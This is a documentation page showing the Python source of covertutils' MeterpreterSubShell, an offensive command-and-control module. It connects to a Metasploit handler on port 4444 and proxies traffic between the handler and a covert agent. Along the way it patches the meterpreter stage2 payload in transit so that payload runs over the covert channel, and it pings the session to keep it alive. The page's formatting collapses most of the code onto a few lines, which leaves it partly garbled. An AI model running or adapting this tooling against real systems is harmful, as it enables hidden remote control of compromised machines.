Source code for covertutils.shells.subshells.meterpretersubshell

from covertutils.shells.subshells import SimpleSubShell

# from covertutils.payloads.generic.meterpreter import stage2_patches
import socket
import threading
from time import sleep

import struct

__select_replacement = '''
import select
def dummy(*args, **kwargs) :
	if s.empty() : return [],[],[]
	return [s],[],[] = dummy

stage2_patches = [

	("DEBUGGING = False", "DEBUGGING = True"),
	("#!/usr/bin/python", 'print "[!!!] METERPRETER passed control!"'),
	("TRY_TO_FORK = True", "TRY_TO_FORK = False"),
	("import select", __select_replacement),
	(' = ', '='),
	(', ',',')

[docs]def meterpreter_proxy( proxy_socket, instance ) : print ("Started Meterpreter Proxy thread") b = 42231 # b = 41116 # b = 4096 # b = 2048 stage_sent = False while True : # print "recv'ing", resp = proxy_socket.recv(b) # print "recv()'d %d bytes of data'" % b # if resp : # print "[+] Received from Handler: " + resp.encode('hex') if "#!/usr/bin/python" in resp : print "[!]Injecting bypass" resp2 = resp for patch in stage2_patches : # apply patches to source resp2 = resp2.replace(*patch) l = len(resp2) print "Final Length = %d" % l resp = struct.pack("<I", l) + resp2[4:] # prepending the new length integer instance.stats['outgoing'] += len(resp) instance.handler.preferred_send( resp, ) if not stage_sent : stage_sent = True
# if stage_sent # sleep(0.01) # b = 64
[docs]class MeterpreterSubShell ( SimpleSubShell ) : # intro = """ # This is an Example Shell. It has a custom prompt, and reverses all input before sending to the stage. # """
[docs] def __init__( self, stream, handler, queue_dict, base_shell, ignore_messages = set(), prompt_templ = "{stream} < ") : SimpleSubShell.__init__( self, stream, handler, queue_dict, base_shell, ignore_messages, prompt_templ ) """A method that uses the `prompt_templ` argument to reformat the prompt (in case the `format()` {tags} have changed)""" self.updatePrompt() def meterpreter_send(message, instance) : if message in ignore_messages : return print ("[+] Received from Agent {") print "[!] '%s'" % message.encode('hex') send_len = instance.proxy.send(message) instance.stats['incoming'] += len(message) print "[+] Message Delivered to Handler! (%d bytes)}" % send_len print ("Creating Proxy socket") self.proxy = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.proxy.connect(("",4444)) # Metasploits Handler print ("Connected to meterpreter handler socket!") self.stats = { 'incoming' : 0, 'outgoing' : 0, 'handler' : None, } self.message_function = meterpreter_send sleep(0.1) self.proxy_thread = threading.Thread( target = meterpreter_proxy, args = ( self.proxy, self ) ) self.proxy_thread.daemon = True self.proxy_thread.start() self.pinger_thread = threading.Thread( target = self.ping_meterpreter ) self.pinger_thread.daemon = True self.pinger_thread.start()
[docs] def default( self, line ) : print self.stats # command = line[::-1] # Reversing the user input string # print( "Sending '%s' to the 'meterpreter' agent!" % line ) # self.handler.preferred_send( line, ) pass
[docs] def ping_meterpreter( self, ping = 'X', delay = 1 ) : while True : self.handler.preferred_send( ping, ) sleep(delay)